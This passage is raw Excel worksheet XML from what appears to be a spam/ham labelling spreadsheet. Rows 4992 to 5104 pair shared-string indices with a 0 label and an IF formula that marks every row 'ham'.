      </c>
      <c r="C4992" t="str">
        <f t="shared" si="77"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4993" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4993" t="s">
        <v>4336</v>
      </c>
      <c r="B4993">
        <v>0</v>
      </c>
      <c r="C4993" t="str">
        <f t="shared" si="77"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4994" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4994" t="s">
        <v>4337</v>
      </c>
      <c r="B4994">
        <v>0</v>
      </c>
      <c r="C4994" t="str">
        <f t="shared" ref="C4994:C5057" si="78">IF(B4994="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4995" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4995" t="s">
        <v>4338</v>
      </c>
      <c r="B4995">
        <v>0</v>
      </c>
      <c r="C4995" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4996" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4996" t="s">
        <v>4339</v>
      </c>
      <c r="B4996">
        <v>0</v>
      </c>
      <c r="C4996" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4997" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4997" t="s">
        <v>4340</v>
      </c>
      <c r="B4997">
        <v>0</v>
      </c>
      <c r="C4997" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4998" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4998" t="s">
        <v>4341</v>
      </c>
      <c r="B4998">
        <v>0</v>
      </c>
      <c r="C4998" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4999" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4999" t="s">
        <v>4342</v>
      </c>
      <c r="B4999">
        <v>0</v>
      </c>
      <c r="C4999" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5000" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5000" t="s">
        <v>4343</v>
      </c>
      <c r="B5000">
        <v>0</v>
      </c>
      <c r="C5000" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5001" t="s">
        <v>4344</v>
      </c>
      <c r="B5001">
        <v>0</v>
      </c>
      <c r="C5001" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5002" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5002" t="s">
        <v>4345</v>
      </c>
      <c r="B5002">
        <v>0</v>
      </c>
      <c r="C5002" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5003" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5003" t="s">
        <v>4346</v>
      </c>
      <c r="B5003">
        <v>0</v>
      </c>
      <c r="C5003" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5004" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5004" t="s">
        <v>4347</v>
      </c>
      <c r="B5004">
        <v>0</v>
      </c>
      <c r="C5004" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5005" t="s">
        <v>4348</v>
      </c>
      <c r="B5005">
        <v>0</v>
      </c>
      <c r="C5005" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5006" t="s">
        <v>4349</v>
      </c>
      <c r="B5006">
        <v>0</v>
      </c>
      <c r="C5006" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5007" t="s">
        <v>4350</v>
      </c>
      <c r="B5007">
        <v>0</v>
      </c>
      <c r="C5007" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5008" t="s">
        <v>4351</v>
      </c>
      <c r="B5008">
        <v>0</v>
      </c>
      <c r="C5008" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5009" t="s">
        <v>4352</v>
      </c>
      <c r="B5009">
        <v>0</v>
      </c>
      <c r="C5009" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5010" t="s">
        <v>21</v>
      </c>
      <c r="B5010">
        <v>0</v>
      </c>
      <c r="C5010" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5011" t="s">
        <v>4353</v>
      </c>
      <c r="B5011">
        <v>0</v>
      </c>
      <c r="C5011" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5012" t="s">
        <v>4354</v>
      </c>
      <c r="B5012">
        <v>0</v>
      </c>
      <c r="C5012" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5013" t="s">
        <v>4355</v>
      </c>
      <c r="B5013">
        <v>0</v>
      </c>
      <c r="C5013" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5014" t="s">
        <v>4356</v>
      </c>
      <c r="B5014">
        <v>0</v>
      </c>
      <c r="C5014" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5015" t="s">
        <v>4357</v>
      </c>
      <c r="B5015">
        <v>0</v>
      </c>
      <c r="C5015" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5016" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5016" t="s">
        <v>4358</v>
      </c>
      <c r="B5016">
        <v>0</v>
      </c>
      <c r="C5016" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5017" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5017" t="s">
        <v>4359</v>
      </c>
      <c r="B5017">
        <v>0</v>
      </c>
      <c r="C5017" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5018" t="s">
        <v>4360</v>
      </c>
      <c r="B5018">
        <v>0</v>
      </c>
      <c r="C5018" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5019" t="s">
        <v>4361</v>
      </c>
      <c r="B5019">
        <v>0</v>
      </c>
      <c r="C5019" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5020" t="s">
        <v>4362</v>
      </c>
      <c r="B5020">
        <v>0</v>
      </c>
      <c r="C5020" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5021" t="s">
        <v>4363</v>
      </c>
      <c r="B5021">
        <v>0</v>
      </c>
      <c r="C5021" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5022" t="s">
        <v>4364</v>
      </c>
      <c r="B5022">
        <v>0</v>
      </c>
      <c r="C5022" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5023" t="s">
        <v>4365</v>
      </c>
      <c r="B5023">
        <v>0</v>
      </c>
      <c r="C5023" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5024" t="s">
        <v>4366</v>
      </c>
      <c r="B5024">
        <v>0</v>
      </c>
      <c r="C5024" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5025" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5025" t="s">
        <v>4367</v>
      </c>
      <c r="B5025">
        <v>0</v>
      </c>
      <c r="C5025" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5026" t="s">
        <v>4368</v>
      </c>
      <c r="B5026">
        <v>0</v>
      </c>
      <c r="C5026" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5027" t="s">
        <v>4369</v>
      </c>
      <c r="B5027">
        <v>0</v>
      </c>
      <c r="C5027" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5028" t="s">
        <v>4370</v>
      </c>
      <c r="B5028">
        <v>0</v>
      </c>
      <c r="C5028" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5029" t="s">
        <v>4371</v>
      </c>
      <c r="B5029">
        <v>0</v>
      </c>
      <c r="C5029" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5030" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5030" t="s">
        <v>4372</v>
      </c>
      <c r="B5030">
        <v>0</v>
      </c>
      <c r="C5030" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5031" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5031" t="s">
        <v>4373</v>
      </c>
      <c r="B5031">
        <v>0</v>
      </c>
      <c r="C5031" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5032" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5032" t="s">
        <v>4374</v>
      </c>
      <c r="B5032">
        <v>0</v>
      </c>
      <c r="C5032" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5033" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5033" t="s">
        <v>4375</v>
      </c>
      <c r="B5033">
        <v>0</v>
      </c>
      <c r="C5033" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5034" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5034" t="s">
        <v>4376</v>
      </c>
      <c r="B5034">
        <v>0</v>
      </c>
      <c r="C5034" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5035" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5035" t="s">
        <v>4377</v>
      </c>
      <c r="B5035">
        <v>0</v>
      </c>
      <c r="C5035" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5036" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5036" t="s">
        <v>4378</v>
      </c>
      <c r="B5036">
        <v>0</v>
      </c>
      <c r="C5036" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5037" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5037" t="s">
        <v>4379</v>
      </c>
      <c r="B5037">
        <v>0</v>
      </c>
      <c r="C5037" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5038" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5038" t="s">
        <v>4380</v>
      </c>
      <c r="B5038">
        <v>0</v>
      </c>
      <c r="C5038" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5039" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5039" t="s">
        <v>4381</v>
      </c>
      <c r="B5039">
        <v>0</v>
      </c>
      <c r="C5039" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5040" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5040" t="s">
        <v>4382</v>
      </c>
      <c r="B5040">
        <v>0</v>
      </c>
      <c r="C5040" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5041" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5041" t="s">
        <v>4383</v>
      </c>
      <c r="B5041">
        <v>0</v>
      </c>
      <c r="C5041" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5042" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5042" t="s">
        <v>4384</v>
      </c>
      <c r="B5042">
        <v>0</v>
      </c>
      <c r="C5042" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5043" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5043" t="s">
        <v>4385</v>
      </c>
      <c r="B5043">
        <v>0</v>
      </c>
      <c r="C5043" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5044" t="s">
        <v>4386</v>
      </c>
      <c r="B5044">
        <v>0</v>
      </c>
      <c r="C5044" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5045" t="s">
        <v>4387</v>
      </c>
      <c r="B5045">
        <v>0</v>
      </c>
      <c r="C5045" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5046" t="s">
        <v>4388</v>
      </c>
      <c r="B5046">
        <v>0</v>
      </c>
      <c r="C5046" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5047" t="s">
        <v>4389</v>
      </c>
      <c r="B5047">
        <v>0</v>
      </c>
      <c r="C5047" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5048" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5048" t="s">
        <v>4390</v>
      </c>
      <c r="B5048">
        <v>0</v>
      </c>
      <c r="C5048" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5049" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5049" t="s">
        <v>4391</v>
      </c>
      <c r="B5049">
        <v>0</v>
      </c>
      <c r="C5049" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5050" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5050" t="s">
        <v>21</v>
      </c>
      <c r="B5050">
        <v>0</v>
      </c>
      <c r="C5050" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5051" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5051" t="s">
        <v>4392</v>
      </c>
      <c r="B5051">
        <v>0</v>
      </c>
      <c r="C5051" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5052" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5052" t="s">
        <v>4393</v>
      </c>
      <c r="B5052">
        <v>0</v>
      </c>
      <c r="C5052" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5053" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5053" t="s">
        <v>4394</v>
      </c>
      <c r="B5053">
        <v>0</v>
      </c>
      <c r="C5053" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5054" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5054" t="s">
        <v>4395</v>
      </c>
      <c r="B5054">
        <v>0</v>
      </c>
      <c r="C5054" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5055" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5055" t="s">
        <v>4396</v>
      </c>
      <c r="B5055">
        <v>0</v>
      </c>
      <c r="C5055" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5056" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5056" t="s">
        <v>4397</v>
      </c>
      <c r="B5056">
        <v>0</v>
      </c>
      <c r="C5056" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5057" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5057" t="s">
        <v>4398</v>
      </c>
      <c r="B5057">
        <v>0</v>
      </c>
      <c r="C5057" t="str">
        <f t="shared" si="78"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5058" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5058" t="s">
        <v>4399</v>
      </c>
      <c r="B5058">
        <v>0</v>
      </c>
      <c r="C5058" t="str">
        <f t="shared" ref="C5058:C5121" si="79">IF(B5058="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="5059" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5059" t="s">
        <v>4400</v>
      </c>
      <c r="B5059">
        <v>0</v>
      </c>
      <c r="C5059" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5060" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5060" t="s">
        <v>4401</v>
      </c>
      <c r="B5060">
        <v>0</v>
      </c>
      <c r="C5060" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5061" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5061" t="s">
        <v>4402</v>
      </c>
      <c r="B5061">
        <v>0</v>
      </c>
      <c r="C5061" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5062" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5062" t="s">
        <v>4403</v>
      </c>
      <c r="B5062">
        <v>0</v>
      </c>
      <c r="C5062" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5063" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5063" t="s">
        <v>4404</v>
      </c>
      <c r="B5063">
        <v>0</v>
      </c>
      <c r="C5063" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5064" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5064" t="s">
        <v>4405</v>
      </c>
      <c r="B5064">
        <v>0</v>
      </c>
      <c r="C5064" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5065" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5065" t="s">
        <v>4406</v>
      </c>
      <c r="B5065">
        <v>0</v>
      </c>
      <c r="C5065" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5066" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5066" t="s">
        <v>4407</v>
      </c>
      <c r="B5066">
        <v>0</v>
      </c>
      <c r="C5066" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5067" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5067" t="s">
        <v>4408</v>
      </c>
      <c r="B5067">
        <v>0</v>
      </c>
      <c r="C5067" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5068" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5068" t="s">
        <v>4409</v>
      </c>
      <c r="B5068">
        <v>0</v>
      </c>
      <c r="C5068" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5069" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5069" t="s">
        <v>4410</v>
      </c>
      <c r="B5069">
        <v>0</v>
      </c>
      <c r="C5069" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5070" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5070" t="s">
        <v>4411</v>
      </c>
      <c r="B5070">
        <v>0</v>
      </c>
      <c r="C5070" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5071" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5071" t="s">
        <v>4412</v>
      </c>
      <c r="B5071">
        <v>0</v>
      </c>
      <c r="C5071" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5072" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5072" t="s">
        <v>4413</v>
      </c>
      <c r="B5072">
        <v>0</v>
      </c>
      <c r="C5072" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5073" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5073" t="s">
        <v>4414</v>
      </c>
      <c r="B5073">
        <v>0</v>
      </c>
      <c r="C5073" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5074" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5074" t="s">
        <v>4415</v>
      </c>
      <c r="B5074">
        <v>0</v>
      </c>
      <c r="C5074" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5075" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5075" t="s">
        <v>4416</v>
      </c>
      <c r="B5075">
        <v>0</v>
      </c>
      <c r="C5075" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5076" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5076" t="s">
        <v>4417</v>
      </c>
      <c r="B5076">
        <v>0</v>
      </c>
      <c r="C5076" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5077" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5077" t="s">
        <v>4418</v>
      </c>
      <c r="B5077">
        <v>0</v>
      </c>
      <c r="C5077" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5078" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5078" t="s">
        <v>21</v>
      </c>
      <c r="B5078">
        <v>0</v>
      </c>
      <c r="C5078" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5079" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5079" t="s">
        <v>4419</v>
      </c>
      <c r="B5079">
        <v>0</v>
      </c>
      <c r="C5079" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5080" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5080" t="s">
        <v>4420</v>
      </c>
      <c r="B5080">
        <v>0</v>
      </c>
      <c r="C5080" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5081" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5081" t="s">
        <v>4421</v>
      </c>
      <c r="B5081">
        <v>0</v>
      </c>
      <c r="C5081" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5082" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5082" t="s">
        <v>4422</v>
      </c>
      <c r="B5082">
        <v>0</v>
      </c>
      <c r="C5082" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5083" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5083" t="s">
        <v>21</v>
      </c>
      <c r="B5083">
        <v>0</v>
      </c>
      <c r="C5083" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5084" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5084" t="s">
        <v>4423</v>
      </c>
      <c r="B5084">
        <v>0</v>
      </c>
      <c r="C5084" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5085" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5085" t="s">
        <v>21</v>
      </c>
      <c r="B5085">
        <v>0</v>
      </c>
      <c r="C5085" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5086" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5086" t="s">
        <v>21</v>
      </c>
      <c r="B5086">
        <v>0</v>
      </c>
      <c r="C5086" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5087" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5087" t="s">
        <v>21</v>
      </c>
      <c r="B5087">
        <v>0</v>
      </c>
      <c r="C5087" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5088" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5088" t="s">
        <v>4424</v>
      </c>
      <c r="B5088">
        <v>0</v>
      </c>
      <c r="C5088" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5089" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5089" t="s">
        <v>4425</v>
      </c>
      <c r="B5089">
        <v>0</v>
      </c>
      <c r="C5089" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5090" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5090" t="s">
        <v>4426</v>
      </c>
      <c r="B5090">
        <v>0</v>
      </c>
      <c r="C5090" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5091" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5091" t="s">
        <v>4427</v>
      </c>
      <c r="B5091">
        <v>0</v>
      </c>
      <c r="C5091" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5092" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5092" t="s">
        <v>4428</v>
      </c>
      <c r="B5092">
        <v>0</v>
      </c>
      <c r="C5092" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5093" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5093" t="s">
        <v>4429</v>
      </c>
      <c r="B5093">
        <v>0</v>
      </c>
      <c r="C5093" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5094" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5094" t="s">
        <v>4430</v>
      </c>
      <c r="B5094">
        <v>0</v>
      </c>
      <c r="C5094" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5095" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5095" t="s">
        <v>4431</v>
      </c>
      <c r="B5095">
        <v>0</v>
      </c>
      <c r="C5095" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5096" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5096" t="s">
        <v>4432</v>
      </c>
      <c r="B5096">
        <v>0</v>
      </c>
      <c r="C5096" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5097" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5097" t="s">
        <v>4433</v>
      </c>
      <c r="B5097">
        <v>0</v>
      </c>
      <c r="C5097" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5098" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5098" t="s">
        <v>4434</v>
      </c>
      <c r="B5098">
        <v>0</v>
      </c>
      <c r="C5098" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5099" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5099" t="s">
        <v>4435</v>
      </c>
      <c r="B5099">
        <v>0</v>
      </c>
      <c r="C5099" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5100" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5100" t="s">
        <v>4436</v>
      </c>
      <c r="B5100">
        <v>0</v>
      </c>
      <c r="C5100" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5101" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5101" t="s">
        <v>4437</v>
      </c>
      <c r="B5101">
        <v>0</v>
      </c>
      <c r="C5101" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5102" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5102" t="s">
        <v>4438</v>
      </c>
      <c r="B5102">
        <v>0</v>
      </c>
      <c r="C5102" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5103" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5103" t="s">
        <v>21</v>
      </c>
      <c r="B5103">
        <v>0</v>
      </c>
      <c r="C5103" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5104" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5104" t="s">
        <v>4439</v>
      </c>
      <c r="B5104">
        <v>0</v>
      </c>
      <c r="C5104" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
